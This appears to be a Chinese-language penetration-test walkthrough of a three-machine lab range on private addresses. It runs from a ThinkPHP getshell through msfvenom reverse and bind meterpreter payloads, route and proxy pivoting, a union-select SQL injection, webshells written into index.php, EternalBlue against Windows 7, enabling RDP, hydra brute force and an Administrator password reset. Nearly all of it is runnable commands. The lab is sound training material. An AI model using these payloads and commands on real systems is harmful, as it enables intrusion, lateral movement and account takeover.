kali 192.168.1.131
1.CentOs 192.168.1.130 192.168.22.129
2.Ubuntu 192.168.22.128 192.168.33.128
3.Win7 192.168.33.1
账号密码都是root teamssix.com
扫描kali同段主机 也就是1段nmap 192.168.1.0/24
找到192.168.1.130,就是靶机1CentOs, 还带出来点端口
直接上80端口看一看 ,v5的ThinkPHP
这直接找个工具梭
getshell用了个Railgun1的漏扫工具 ,还不错
蚁剑连接成功 getshell, 可以ifconfig
1,生成linux木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.131 LPORT=4444 -f elf>1.elf
2,上传到蚁剑
3,msf开启监听
msfdb run
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.131
set LPORT 4444
exploit
4,蚁剑运行linux木马 ,msf成功上线
拿到会话后进行信息收集,获取网络接口
run get_local_subnets
扫到22网段 ,在蚁剑里ifconfig 也是可以知道网段
存在22网段,现在我们是在1网段进行沟通,如何访问到22网段呢,msf和cs都有代理集成功能,我们使用这些功能设置.,先添加路由
run autoroute -s 192.168.22.0/24
run autoroute -p
查看地址解析记录arp -a确定第二层目标为192.168.22.128
arp -a
现在的会话是session1,是建立在Target1的shell上的,建立路由后可以和22网段进行通信。那么我们想要通过session1用工具去攻击22网段,这个时候该怎么办呢?
为了解决这种情况,我们可以在本地(msf上有模块可以开代理)开一个代理,通过这个代理给其他人一个端口去连接,然后我们就可以用自己的本机(自己的电脑,不是攻击机kali)去连接kali的端口,这样就能访问192.168.22.129了
background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
exploit
在linux系统下,可以利用本地的代理接口进行访问
vim /etc/proxychains4.conf
kali的ip和刚才的端口
然后用代理文件进行扫描 22网段
proxychains4 nmap -Pn -sT 192.168.22.128
上面扫出80 端口,直接访问
robots.txt中有入口
主页源码里有hint,那就直接sql注入
sqlmap用代理 连接不稳不能用
手工注入,39个回显点
http://192.168.22.128/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+
剩下就很简单了 拿到用户名密码,密码还要md5解密一下
amdin
46f94c8de14fb36680850768ff1b7f2a ---> 123qwe
登录进来
在index.php写入马,有好几个index.php 全都写一个
然后测试phpinfo可以
那就直接上蚁剑连,需要代理 用这个工具不错(但是我不上代理好像也连上了。。包括访问80端口)
getshell了,先不管了,继续上线msf
继续设路由继续下一层
继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它
msf生成正向后门msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf
msf正向连接
background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
run
执行3.elf
还是老步骤,信息收集+配置访问
获取网络接口:run get_local_subnets
添加路由地址:run autoroute -s 192.168.33.0/24
查看路由地址:run autoroute -p
然后再重新搞个代理 (我刚开始没重新配代理,用1080那个,但是3389连不上去,重新配了一个倒是成功了
原因不详)
background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 8081
exploit
修改配置文件
vim /etc/proxychains4.conf
尝试扫描33网段
proxychains nmap -Pn -sT 192.168.33.33
发现这是开放着445、3389端口的Windows系统 ,使用永恒之蓝试试
msf打永恒之蓝background 极其重要
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run
这个background很重要,我第一次就是因为没这一步而没打通,浪费很多时间找错
拿到会话后随便执行系统命令了,这里shell乱码,可以输入chcp 65001修改编码,就好了
查看端口
netstat -an
这里3389是打开的
使用meterpreter命令 run getgui -e 开放目标机3389远程桌面端口
开放3389: meterpreter > run getgui -e
开启远程桌面:meterpreter > run post/windows/manage/enable_rdp
windows打开3389远程连接的命令有两种办法,任选其一:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
表示成功
爆破3389用户密码
proxychains hydra 192.168.33.33 rdp -l Administrator -P pass.txt -V
修改用户密码
有权限直接修改密码真爽
net user
net user Administrator 123
xfreerdp工具
命令格式如下: 很容易理解,/u就是用户名,/p是密码,/v是靶机(目标)的地址 /size就是图形化界面的大小而已
proxychains xfreerdp /u:Administrator /p:123 /v:192.168.33.33 /size:80%
rdesktop
命令格式很简单:
proxychains rdesktop 192.168.33.33
远程桌面连接成功,可以随心所欲搞了,留个hack.txt
